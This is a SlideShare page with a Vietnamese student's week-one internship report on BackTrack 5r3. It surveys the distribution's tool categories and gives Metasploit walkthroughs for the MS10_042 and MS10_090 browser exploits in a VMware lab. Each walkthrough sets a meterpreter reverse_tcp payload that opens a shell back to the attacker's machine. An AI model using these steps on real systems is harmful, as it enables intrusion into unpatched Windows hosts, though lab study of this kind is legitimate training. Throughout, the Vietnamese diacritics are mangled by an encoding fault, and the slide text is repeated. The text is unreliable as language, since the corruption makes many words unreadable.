際際滷

際際滷Share a Scribd company logo

Report athena week 1

Download as DOCX, PDF
Li棚n H叩n
Li棚n H叩n

B叩o c叩o th畛c t畉p tu畉n th畛 1

1 of 3
Download to read offline
H畛 T棚n: 畛 Li棚n H叩n Tr動畛ng: 畉i H畛c Qu畛c T畉 B叩o C叩o Tu畉n 1 Ch畛 畛: Nghi棚n C畛u v畛 c叩c ch畛c nng c畛a backtrack 畛 ki畛m tra an ninh m畉ng. C叩c V畉n 畛 C畛a Tu畉n Th畛 1: 1. Nh畉n ti li畛u v g畉p gi叩o vi棚n h動畛ng d畉n 2. Ci 畉t backtrack 5r3 3. Th畛c hnh lm quen v畛i backtrack qua 2 l畛i MS10_090 v MS10_042
I. Backtrack l g狸? Backtrack l m畛t b畉n ph但n ph畛i d畉ng Live DVD c畛a Linux, 動畛c ph叩t tri畛n 畛 th畛 nghi畛m th但m nh畉p. Trong c叩c 畛nh d畉ng Live DVD, c坦 th畛 s畛 d畛ng Backtrack tr畛c ti畉p t畛 DVD ho畉c ci 畉t tr棚n m叩y v s畛 d畛ng nh動 m畛t h畛 i畛u hnh. Backtrack h畛 tr畛 m畛t c叩ch nhanh ch坦ng cho vi畛c t狸m ki畉m v c畉p nh畉t c董 s畛 d畛 li畛u c叩c c担ng c畛 b畉o m畉t. Backtrack c坦 l畛ch s畛 ph叩t tri畛n qua nhi畛u b畉n Linux kh叩c nhau (phi棚n b畉n hi畛n nay s畛 d畛ng b畉n ph但n ph畛i Slackware Linux) v li棚n t畛c c畉p nh畉p c叩c c担ng c畛, drivers qua c叩c phi棚n b畉n C担ng c畛 ki畛m th畛 b畉o m畉t trong Backtrack c坦 th畛 動畛c ph但n lo畉i thnh c叩c nh坦m nh動 sau: Information gathering: S畛 d畛ng 畛 c坦 動畛c th担ng tin li棚n quan 畉n m畛t m畛c ti棚u DNS, 畛a ch畛 email, trang web, m叩y ch畛 mail. Network mapping: Qu辿t thm d嘆, bao g畛m vi畛c ki畛m tra c叩c host ang t畛n t畉i, th担ng tin v畛 h畛 i畛u hnh, 畛ng d畛ng 動畛c s畛 d畛ng b畛i m畛c ti棚u. Vulnerability identification: Qu辿t c叩c l畛 h畛ng, ph但n t鱈ch Server Message Block (SMB) v Simple Network Management Protocol (SNMP). Web application analysis: Theo d探i, gi叩m s叩t c叩c 畛ng d畛ng web. Radio network analysis: Ki畛m tra m畉ng kh担ng d但y, bluetooth v nh畉n d畉ng t畉n s畛 v担 tuy畉n (RFID). Penetration: Khai th叩c c叩c l畛 h畛ng t狸m th畉y trong c叩c m叩y t鱈nh m畛c ti棚u. Privilege escalation: Sau khi khai th叩c c叩c l畛 h畛ng v 動畛c truy c畉p vo c叩c m叩y t鱈nh m畛c ti棚u, c叩c c担ng c畛 trong lo畉i ny c坦 th畛 s畛 d畛ng 畛 leo thang 畉c quy畛n. Maintaining access: Duy tr狸 quy畛n truy c畉p vo c叩c m叩y t鱈nh m畛c ti棚u. Nh畛ng 畉c quy畛n cao nh畉t l i畛u ki畛n c畉n thi畉t tr動畛c khi c坦 th畛 ci 畉t c担ng c畛 畛 duy tr狸 quy畛n truy c畉p. Voice Over IP (VOIP): C叩c c担ng c畛 畛 ph但n t鱈ch VOIP. Digital forensics: Ph但n t鱈ch h狸nh 畉nh 挑a c畛ng, c畉u tr炭c c叩c t畉p tinc坦 th畛 ch畛n Start Backtrack Forensics trong tr狸nh 董n kh畛i 畛ng. Reverse engineering: G畛 r畛i ch動董ng tr狸nh ho畉c th叩o r畛i t畉p tin th畛c thi.
II. C叩c b動畛c th畛c hi畛n l畛i MS10_042 v MS10_090: a. L畛i MS10_042: 1. Kh畛i 畛ng VMWare v畛i 2 c畛a s畛 backtrack v windows XP. 2. 畛 c畛a s畛 backtrack, kh畛i 畛ng c畛a s畛 terminal v g探 l畛nh msfconsole. 3. Sau 坦 dung l畛nh search ms10_042 畛 t狸m ki畉m module. 4. K畉 ti畉p d湛ng l畛nh use exploit/windows/browser/ms10_042_helpctr_xss_cmd_exec. 5. Ta d湛ng l畛nh show options 畛 ki畛m tra c叩c th担ng tin thu畛c t鱈nh c畉n thi畉t cho m達 l畛i. 6. Thi畉t l畉p c叩c th担ng tin c畉n thi畉t nh動: (1) Set srvhost [IP c畛a m叩y backtrack] (2) Set lhost [IP c畛a m叩y backtrack] (3) Set payload windows/meterpreter/reverse_tcp 7. D湛ng l畛nh exploit 畛 tri畛n khai. 8. Sau c湛ng l ch畛 m叩y n畉n nh但n truy c畉p vo 畛a ch畛 達 exploit. b. L畛i MS10_090: 1. Kh畛i 畛ng VMWare v畛i 2 c畛a s畛 backtrack v windows XP. 2. 畛 c畛a s畛 backtrack, kh畛i 畛ng c畛a s畛 terminal v g探 l畛nh msfconsole. 3. Sau 坦 dung l畛nh search ms10_090 畛 t狸m ki畉m module. 4. K畉 ti畉p d湛ng l畛nh use exploit/windows/browser/ms10_090_ie_css_clip. 5. Ta d湛ng l畛nh show options 畛 ki畛m tra c叩c th担ng tin thu畛c t鱈nh c畉n thi畉t cho m達 l畛i. 6. Thi畉t l畉p c叩c th担ng tin c畉n thi畉t nh動: (1) Set srvhost [IP c畛a m叩y backtrack] (2) Set lhost [IP c畛a m叩y backtrack] (3) Set payload windows/meterpreter/reverse_tcp 7. D湛ng l畛nh exploit 畛 tri畛n khai. 8. Sau c湛ng l ch畛 m叩y n畉n nh但n truy c畉p vo 動畛ng d畉n 達 exploit. Demo cho 2 l畛i tr棚n t畉i link: MS10_042 畛 t畉i trang: http://youtu.be/Vk5697U2dMg MS10_090 畛 t畉i trang: http://youtu.be/t3rewc4tcCw

More Related Content

Report athena week 1

  • 1. H畛 T棚n: 畛 Li棚n H叩n Tr動畛ng: 畉i H畛c Qu畛c T畉 B叩o C叩o Tu畉n 1 Ch畛 畛: Nghi棚n C畛u v畛 c叩c ch畛c nng c畛a backtrack 畛 ki畛m tra an ninh m畉ng. C叩c V畉n 畛 C畛a Tu畉n Th畛 1: 1. Nh畉n ti li畛u v g畉p gi叩o vi棚n h動畛ng d畉n 2. Ci 畉t backtrack 5r3 3. Th畛c hnh lm quen v畛i backtrack qua 2 l畛i MS10_090 v MS10_042
  • 2. I. Backtrack l g狸? Backtrack l m畛t b畉n ph但n ph畛i d畉ng Live DVD c畛a Linux, 動畛c ph叩t tri畛n 畛 th畛 nghi畛m th但m nh畉p. Trong c叩c 畛nh d畉ng Live DVD, c坦 th畛 s畛 d畛ng Backtrack tr畛c ti畉p t畛 DVD ho畉c ci 畉t tr棚n m叩y v s畛 d畛ng nh動 m畛t h畛 i畛u hnh. Backtrack h畛 tr畛 m畛t c叩ch nhanh ch坦ng cho vi畛c t狸m ki畉m v c畉p nh畉t c董 s畛 d畛 li畛u c叩c c担ng c畛 b畉o m畉t. Backtrack c坦 l畛ch s畛 ph叩t tri畛n qua nhi畛u b畉n Linux kh叩c nhau (phi棚n b畉n hi畛n nay s畛 d畛ng b畉n ph但n ph畛i Slackware Linux) v li棚n t畛c c畉p nh畉p c叩c c担ng c畛, drivers qua c叩c phi棚n b畉n C担ng c畛 ki畛m th畛 b畉o m畉t trong Backtrack c坦 th畛 動畛c ph但n lo畉i thnh c叩c nh坦m nh動 sau: Information gathering: S畛 d畛ng 畛 c坦 動畛c th担ng tin li棚n quan 畉n m畛t m畛c ti棚u DNS, 畛a ch畛 email, trang web, m叩y ch畛 mail. Network mapping: Qu辿t thm d嘆, bao g畛m vi畛c ki畛m tra c叩c host ang t畛n t畉i, th担ng tin v畛 h畛 i畛u hnh, 畛ng d畛ng 動畛c s畛 d畛ng b畛i m畛c ti棚u. Vulnerability identification: Qu辿t c叩c l畛 h畛ng, ph但n t鱈ch Server Message Block (SMB) v Simple Network Management Protocol (SNMP). Web application analysis: Theo d探i, gi叩m s叩t c叩c 畛ng d畛ng web. Radio network analysis: Ki畛m tra m畉ng kh担ng d但y, bluetooth v nh畉n d畉ng t畉n s畛 v担 tuy畉n (RFID). Penetration: Khai th叩c c叩c l畛 h畛ng t狸m th畉y trong c叩c m叩y t鱈nh m畛c ti棚u. Privilege escalation: Sau khi khai th叩c c叩c l畛 h畛ng v 動畛c truy c畉p vo c叩c m叩y t鱈nh m畛c ti棚u, c叩c c担ng c畛 trong lo畉i ny c坦 th畛 s畛 d畛ng 畛 leo thang 畉c quy畛n. Maintaining access: Duy tr狸 quy畛n truy c畉p vo c叩c m叩y t鱈nh m畛c ti棚u. Nh畛ng 畉c quy畛n cao nh畉t l i畛u ki畛n c畉n thi畉t tr動畛c khi c坦 th畛 ci 畉t c担ng c畛 畛 duy tr狸 quy畛n truy c畉p. Voice Over IP (VOIP): C叩c c担ng c畛 畛 ph但n t鱈ch VOIP. Digital forensics: Ph但n t鱈ch h狸nh 畉nh 挑a c畛ng, c畉u tr炭c c叩c t畉p tinc坦 th畛 ch畛n Start Backtrack Forensics trong tr狸nh 董n kh畛i 畛ng. Reverse engineering: G畛 r畛i ch動董ng tr狸nh ho畉c th叩o r畛i t畉p tin th畛c thi.
  • 3. II. C叩c b動畛c th畛c hi畛n l畛i MS10_042 v MS10_090: a. L畛i MS10_042: 1. Kh畛i 畛ng VMWare v畛i 2 c畛a s畛 backtrack v windows XP. 2. 畛 c畛a s畛 backtrack, kh畛i 畛ng c畛a s畛 terminal v g探 l畛nh msfconsole. 3. Sau 坦 dung l畛nh search ms10_042 畛 t狸m ki畉m module. 4. K畉 ti畉p d湛ng l畛nh use exploit/windows/browser/ms10_042_helpctr_xss_cmd_exec. 5. Ta d湛ng l畛nh show options 畛 ki畛m tra c叩c th担ng tin thu畛c t鱈nh c畉n thi畉t cho m達 l畛i. 6. Thi畉t l畉p c叩c th担ng tin c畉n thi畉t nh動: (1) Set srvhost [IP c畛a m叩y backtrack] (2) Set lhost [IP c畛a m叩y backtrack] (3) Set payload windows/meterpreter/reverse_tcp 7. D湛ng l畛nh exploit 畛 tri畛n khai. 8. Sau c湛ng l ch畛 m叩y n畉n nh但n truy c畉p vo 畛a ch畛 達 exploit. b. L畛i MS10_090: 1. Kh畛i 畛ng VMWare v畛i 2 c畛a s畛 backtrack v windows XP. 2. 畛 c畛a s畛 backtrack, kh畛i 畛ng c畛a s畛 terminal v g探 l畛nh msfconsole. 3. Sau 坦 dung l畛nh search ms10_090 畛 t狸m ki畉m module. 4. K畉 ti畉p d湛ng l畛nh use exploit/windows/browser/ms10_090_ie_css_clip. 5. Ta d湛ng l畛nh show options 畛 ki畛m tra c叩c th担ng tin thu畛c t鱈nh c畉n thi畉t cho m達 l畛i. 6. Thi畉t l畉p c叩c th担ng tin c畉n thi畉t nh動: (1) Set srvhost [IP c畛a m叩y backtrack] (2) Set lhost [IP c畛a m叩y backtrack] (3) Set payload windows/meterpreter/reverse_tcp 7. D湛ng l畛nh exploit 畛 tri畛n khai. 8. Sau c湛ng l ch畛 m叩y n畉n nh但n truy c畉p vo 動畛ng d畉n 達 exploit. Demo cho 2 l畛i tr棚n t畉i link: MS10_042 畛 t畉i trang: http://youtu.be/Vk5697U2dMg MS10_090 畛 t畉i trang: http://youtu.be/t3rewc4tcCw